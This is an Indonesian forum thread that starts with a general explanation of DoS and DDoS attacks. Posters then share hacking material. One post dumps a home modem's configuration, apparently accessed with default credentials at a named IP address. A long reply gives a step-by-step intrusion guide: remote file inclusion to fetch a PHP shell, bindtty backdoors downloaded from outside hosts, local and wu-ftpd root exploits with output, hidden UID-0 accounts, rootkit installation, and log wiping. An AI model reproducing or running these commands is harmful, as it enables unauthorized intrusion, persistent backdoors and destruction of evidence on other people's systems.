Pengertian DDoS dan DoS

Denial of Service (DoS)

Varian pertama serangan berupa pengiriman air bah data ke target itu adalah DoS (Denial of Service). Dalam serangan ini penyerang hanya menggunakan satu komputer untuk menyemburkan data ke korbannya.

Penjelasan sederhananya seperti ini: Suatu ketika handphone anda berbunyi. Sebelum anda sempat menggangkatnya handphone anda telah berhenti berbunyi. Tiba-tiba handphone anda berbunyi lagi dan tanpa sempat anda mengangkatnya, bunyi itupun segera berhenti. Beberapa kali anda biarkan tapi masalah ini tak kunjung selesai. Beberapa kolega anda yang hendak menghubungi anda terpaksa tidak bisa melakukannya karena handphone anda sibuk terus. Itulah gambaran sederhana serangan DoS di dunia non-cyber.

Di dunia cyber, kasus anda tersebut merupakan serangan salah satu jenis DOS (Denial of Service). Yang pasti, sebegitu mudahnya DOS ini diterapkan tapi mencegahnya bukanlah suatu hal yang gampang. Target-target serangan DOS biasanya adalah server-server ISP, Internet Banking, E-commerce, Web perusahaan, dan pemerintah.

Serangan DoS dapat dilakukan dengan mengirimkan query sebanyak mungkin hingga target tidak bisa lagi menanganinya sehingga target lumpuh. Cara lain melakukan serangan DoS adalah dengan mengirimkan data rusak atau data yang tidak mampu di tangani oleh server target sehingga server tersebut menjadi hang (tidak bisa berfungsi sebagaimana mestinya dan perlu di restart ulang).

DDOS (Distributed Denial of Service)



Mengirimkan data secara terus menerus dengan menggunakan satu komputer tidak begitu efektif karena biasanya sumber daya server yang diserang lebih besar dari komputer penyerang. Daya bunuh serangan juga akhirnya menjadi lemah.

Hacker penyerangpun memutar otaknya. Serangan dapat lebih mematikan jika tenaga banyak komputer dijadikan satu untuk menciptakan banjir data yang lebih besar.

Komputer-komputer yang diambil alih oleh hacker tersebut disebut zombie. Zombie berfungsi sebagai anak buah atau agent penyerang yang siap beraksi saat mendapat perintah dari “tuannya.”

Semakin banyak zombie yang dkuasai seorang penyerang, semakin berkuasalah sang hacker tersebut karena besarnya tenaga yang ia genggam. Dengan tenaga besar yang dikumpulkan dari komputer-komputer yang dikuasai (secara illegal tentunya) tersebut, serangan DDoS hampir tidak dapat ditangkal. Karena itulah serangan tipe ini sangat populer di kalangan hacker.

Beberapa situs raksasa seperti Amazon.com, eBay, dan Yahoo pada Februari 2000 rontok selama beberapa jam karena serbuan ini. Gedung Putih juga sempat boyongan karena serangan tipe ini. Gedung Putih terpaksa “memindahkan” IP address situsnya karena jengah menerima serangan DDoS yang sudah dirancang untuk muncul pada tanggal dan jam tertentu dengan memanfaatkan virus tertentu tanpa mampu mencegahnya.

DDoS adalah tipe serangan dengan konsep sederhana. Namun efeknya bisa memindahkan “istana negara.”

Halo om ajarin DDoS dong ... bisa kan ?
OM gimana caranya ddos ... mau di ajarin yaa ... ajarin di chanel nya bogani aja .. bs gk om ???


Terima kasih sebelmunya

Yup gene omz qta ini pemula omz to so senior masa pemula mo kase ajar senior bemana le kata ini... mar qta mo kase lia no pa omz apa ini benar or nda mohon omz kase pendapat....


langkah awal cari ip target (irc banyak) huehueehue lol
contoh ::

target nick dhaun is dhaun@125.164.72.110 * Mongondow
dhaun on #@warongbakudapa #@iseng

Sekarang qta mo test maso pa dia pe server, setahu qta semua user speedy pake modem (kalo nda pake modem bukang speedy itu) hahaaa... okey lanjut...!!!

http://125.164.72.110 <<-- brosing di IE default dari pass modem PRolink seri itu Login : admin Password : password

masuk kita ke modem mereka dah sekarang kita mau mendapatkan password dan Login nya kita dump ..

create user name admin passwd password root

size maxvc 8 max1483vc 8 maxppe 8 maxl2tptunnel 1 maxl2tpsesspertunnel 1 maxl2tppeerrws 4

modify system contact “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” model “H90″ location “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” vendor “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” logthresh 1 systime “Jan 01 01:01:08 1970″ timezone “GMT” magicnum 125

modify bridge mode enable

create pfraw rule entry ruleid 15 ifname private dir in act deny

create pfraw rule entry ruleid 16 ifname private act deny

create pfraw rule entry ruleid 17 ifname private dir in act deny

create pfraw rule entry ruleid 18 ifname private act deny

create pfraw rule entry ruleid 19 ifname private dir in act deny

create pfraw rule entry ruleid ifname private act deny

create pfraw rule entry ruleid 21 ifname private dir in act deny

create pfraw rule entry ruleid 22 ifname private act deny

create pfraw rule entry ruleid 23 ifname private dir in act deny

create pfraw subrule entry ruleid 15 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864

create pfraw subrule entry ruleid 16 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864

create pfraw subrule entry ruleid 17 subruleid 1 mask 0xFFFFFFFF start iph offset 16 enable cmpt range 0xE0000000 0xEFFFFFFF

create pfraw subrule entry ruleid 18 subruleid 1 mask 0xFFFFFFFF start iph offset 16 enable cmpt range 0xE0000000 0xEFFFFFFF

create pfraw subrule entry ruleid 19 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8035

create pfraw subrule entry ruleid subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8035

create pfraw subrule entry ruleid 21 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×809B

create pfraw subrule entry ruleid 22 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×809B

create pfraw subrule entry ruleid 23 subruleid 1 mask 0xFFFF offset 12 enable cmpt lteq 0×05DC

create pfraw subrule entry ruleid 23 subruleid 2 mask 0xFFFF offset 14 enable cmpt eq 0xF0F0

create pfraw subrule entry ruleid 24 subruleid 1 mask 0xFFFF offset 12 enable cmpt lteq 0×05DC

create pfraw subrule entry ruleid 24 subruleid 2 mask 0xFFFF offset 14 enable cmpt eq 0xF0F0

create pfraw subrule entry ruleid 25 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8137 0×8138

create ipf rule entry ruleid 1002 dir in act accept destaddr eq 255.255.255.255 transprot eq num 17 destport eq num 67 seclevel high

create ipf rule entry ruleid 1010 dir in destaddr bcast seclevel high

create ipf rule entry ruleid 10 dir in destaddr eq 255.255.255.255 seclevel high

create ipf rule entry ruleid 1030 ifname private dir in act accept storestate enable seclevel high medium low

create ipf rule entry ruleid 1040 ifname private dir out act accept srcaddr self storestate enable seclevel high medium low

create ipf rule entry ruleid 1050 ifname private dir out act accept transprot eq num 17 destport eq num 53 inifname dmz storestate enable seclevel high medium low

create ipf rule entry ruleid 1060 ifname private dir out act accept transprot eq num 6 destport eq num 53 inifname dmz storestate enable seclevel high medium low

create ipf rule entry ruleid 1070 ifname private dir out act accept transprot eq num 6 destport eq num 25 inifname dmz storestate enable seclevel high medium low

create ipf rule entry ruleid 1080 ifname private dir out act accept transprot eq num 6 destport eq num 110 inifname dmz storestate enable seclevel high medium low

modify ipf global pubdefact accept pvtdefact deny dmzdefact accept

modify dhcp server cfg enable

create dhcp server pool start-ip 192.168.1.3 poolid 0 end-ip 192.168.1.34 mask 255.255.255.0

modify snmp trap disable

create rip intf ifname ppp-0

create ethernet intf ifname eth-0 ip 192.168.1.1 mask 255.255.255.0

create usb intf ifname usb-0 ip 192.168.1.2 mask 255.255.255.0

modify ip cfg ttl 64

modify dsl config adsl2plusauto annex adsl2plus framing-3et maxbits 15 rxstart 6 rxend 511 duallatency disable ecfdmmode ec maxdnrate 0×1ff autosraenable disable advcapability annexa adsl2 adsl2plus t1413

create atm port enable ifname atm-0 maxvc 8 oamsrc 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

create ppp security ifname default

create ppp security ifname ppp-0 login 1527050063@telkom.net passwd (qta Hidden) he he he kasihan nanti:tongue:

create atm trfdesc trfindex 0

create atm vc intf ifname aal5-0 lowif atm-0 vpi 0 vci 35 a5maxproto 2

create ppp intf ifname ppp-0 mru 1492 lowif aal5-0 droute true ppoe outside usedns true

modify nat global enable

create nat rule entry ruleid 1 napt

create alg port portno 21 prot num 6 algtype ftp

create alg port portno 1701 prot num 17 algtype l2tp

create alg port portno 1723 prot num 6 algtype pptp

create alg port portno 554 prot num 6 algtype rtsp

create alg port portno 7070 prot num 6 algtype ra

create alg port portno 7648 prot num 6 algtype cuseeme

create alg port portno 1719 prot num 17 algtype h323_ras

create alg port portno 17 prot num 6 algtype h323_q931

create alg port portno 6661 prot num 6 algtype mirc

create alg port portno 6662 prot num 6 algtype mirc

create alg port portno 6663 prot num 6 algtype mirc

create alg port portno 6664 prot num 6 algtype mirc

create alg port portno 6665 prot num 6 algtype mirc

create alg port portno 6666 prot num 6 algtype mirc

create alg port portno 6667 prot num 6 algtype mirc

create alg port portno 6668 prot num 6 algtype mirc

create alg port portno 6669 prot num 6 algtype mirc

create alg port portno 161 prot num 17 algtype snmp

create alg port portno 407 prot num 17 algtype snmp

create bridge port intf ifname eth-0

modify stp port info ifname eth-0 priority 0×80 pcost 100

create dhcp relay intf ifname ppp-0

create igmp intf ifname ppp-0 host

modify autodetect cfg prot ppoe eoa

modify upnp cfg nbstatus enable

modify ilmi access protocol ifname atm-0 vpi 0 vci 35 proto any

trigger ilmi

END

Dah Di atas tersebut hasil dump qta nda mo kase tunjung gimana cara dump jangan le ini artikel somo kase rugi orang banyak... deng sebagian qta hidden... huu sampe disitu jo dulu qta pe server somo don kalo talalu banyak ba Ddos tu nda penting² hehehehe lantaran babalas ni pertanyaan musti praktek kong copy dia pe hasil disini... cuapek dech omzz....!!!!


Gimana omz betul apa salah itu mohon tanggapan kalo ada salah babilang ne omz supaya le junior ini mo perbaiki dimana tu kesalahan piss**

waakakaka....si irecks hebat juga euy

bekeng tko ehh ni baholo ehh!! se blajar akang dunk!! kita ni dia masih newbie klo soal gituan!!bisa nda baholo???!!!

Pakiki wrote:

bekeng tko ehh ni baholo ehh!! se blajar akang dunk!! kita ni dia masih newbie klo soal gituan!!bisa nda baholo???!!!

Torang samua mo bicara newbie di mIRC weleh... nda ada yg jago di dunia ini Kecuali torang pr Tuhan Sandiri...

Qta le orang ada kase belajar... nda sia sia merantau sampe di bali....!!!! banyak ilmu banyak wewene.. wakakakaka......!!!!! Bali kota ilmu kota n*n*n
so itu kamari kong rasa bagemana tu bali pe ganas haus akan ilmu deng n*n*n ...!!!! minjo kamari

tako kita mo ka bali! kage le sampe sana bukang dapa ilmu mer dapa aids!! hewaoihewaoihioaewhiohaewiheawioohaiew

iRecks web mail bom dunkzzzzz

plzzzzz

iRecks ajarin nge root donkzzzz

Admin wrote:

iRecks ajarin nge root donkzzzz

=====================
install shell php
=====================
###contohnya
http://livron.port5.com/mail.php <---------ini source shell
misalnya:
http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php -O log.php
bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita
kalo bisa... buka:
http://www.target.org/modules/My_eGallery/public/log.php

==============
pasang bindtty
==============
###http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c
gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000
diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port
4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, anda dapat mendownload
source kodenya di http://student.te.ugm.ac.id/~phoenix03/tutorial/phnxscan.c. Kompile
dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet www.target.com.
myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com
PING target.com 210.189.77.28: 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka
Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan
password yang default dari scriptnya changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com 210.189.77.28
Escape character is '^]'.
---------------------------------------------------
#### cd /var/tmp ; wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
----------------------------------------------------
#### cd /var/tmp ; wget www.renjana.ws/~toa/bindtty
cd /var/tmp ; chmod 755 bindtty
cd /var/tmp ; ./bindtty
----------------------------------------------------
# test pake `uname -a` < kernel 2.4.20 ke bawah yg bisa
wget http://roseofworld.org/shell.tar
tar -zxvf shell.tar; cd webshell; ./1980
# klo uda buka putty > masukkan host > pilih telnet > isi port: 1980
# klo sukses maka akan masuk shell

### pake bind yg laen jika pengen shellnya ada passwd-nya
cd /var/tmp; wget geocities.com/pothei/nmap;chmod 755 nmap; ./nmap
# telnet ke host port 6665 passwd `stimik`

## cd /tmp; wget http://geocities.com/g4ptek/tools/bind.tgz
tar -zxvf bind.tgz;cd .bind; chmod 755 bindtty; ./dssl bindtty
telnet ke host port 6665 passwd `gagal`

## cd /var/tmp; wget http://geocities.com/g4ptek/tools/dns.php
# chmod 755 dns; ./dns
# telnet www.target.com 6029


-*-------------------*-
-*- belajar NgeRoot -*-
-*-------------------*-

### tahap ngeroot di shell yg tadi kita tembus
mkdir /tmp/temp.log
cd /tmp/temp.log
wget http://roseofworld.org/root.tar.gz
tar -zxvf root.tar.gz
cd root
./loginx 1970 1970
# jika tidak mendapat pesan error maka kmu sukses, pointer $ akan brubah menjadi #
# cek dengan `id` jika root jgn lupa bagi2 shellnya :p
### atau bisa ambil exploit di www.malanghack.net/alat/
mkdir /tmp/temp.log;cd /tmp/temp.log
wget http://www.malanghack.net/alat/w00t
chmod 755 w00t
./w00t
# jika ga muncul pesan error: you got root man!!
+----------------------------------------------------------------------------------------+

-*-----------------*-
-*- Cracking Root -*-
-*-----------------*-
Tips:
mkdir .bash <--- untuk membuat direktori bash
cd .bash <--- untuk masuk ke direktori bash
mkdir <direktory> <--- untuk membuat direktory baru
cd <direktory> <--- untuk masuk ke direktory yg anda mau
cd / <--- untuk keluar dari suatu direktory
rm -rf <file> <--- untuk menghapus file/direktory
-*-----------------------------------------------*-
1. Tahap Pertama :
Cara instalasi Xpost dan ftp

wget http://cyberborneo.b0x.com/xpost.tgz
wget http://cyberborneo.b0x.com/ftp.tgz
tar -zxvf xpost.tgz
tar -zxvf ftp.tgz

-*------*-

2. Tahap Kedua
cd xpost
cd xwurm/
./scan 213.124
setelah dapat wu-scan.log
./masswu wu-scan.log
Setelah didapat pesan sebagai berikut

Trying get root 213.124.151.113 ...
SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ...
Logged in log-root ...

Itu berarti anda telah dapat akses root di IP 213.124.151.113

-*------*-

3. Tahap Ketiga
Buka new sessiom dari putty ssh anda, login kembali ke shell anda

masuk ke direktory ftp anda

cd ftp
./awu 213.124.151.113 ( ip nya)

apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb:

7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).

# trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected.
# banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner

### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]

# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
###################################################################

uid=0(root) gid=0(root) groups=50(ftp)
Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown

whoami

root <-- berarti anda sedang dalam akses root

-*------*-

4. Tahap Keempat

Add login akses root anda
----------------------------------------------------------------

1. Cara I

(bukan utk redhat 7.2)
/usr/sbin/useradd rampok -u 0 -d /

passwd -d rampok
passwd rampok

su rampok <<--------untuk super user

2. Cara II

kalo mau dapet acces root ketik :

/usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
abis itu ketik lagi
passwd crit

wuasu666

Kemudian Add User untuk login shell anda

/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 2X

-*------*-

5. Tahap Kelima

Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan

wget www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup pass yang dimau port yang dimau

contoh : --> ./setup wuasu 7000
cd /

wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install

Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak

rm -rf cleaner.tgz

rm -rf shv4.tar.gz

-*------*-

6. Tahap Keenam

Hapus jejak ngeroot anda ketik perintah berikut:

rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d

SELESAI.....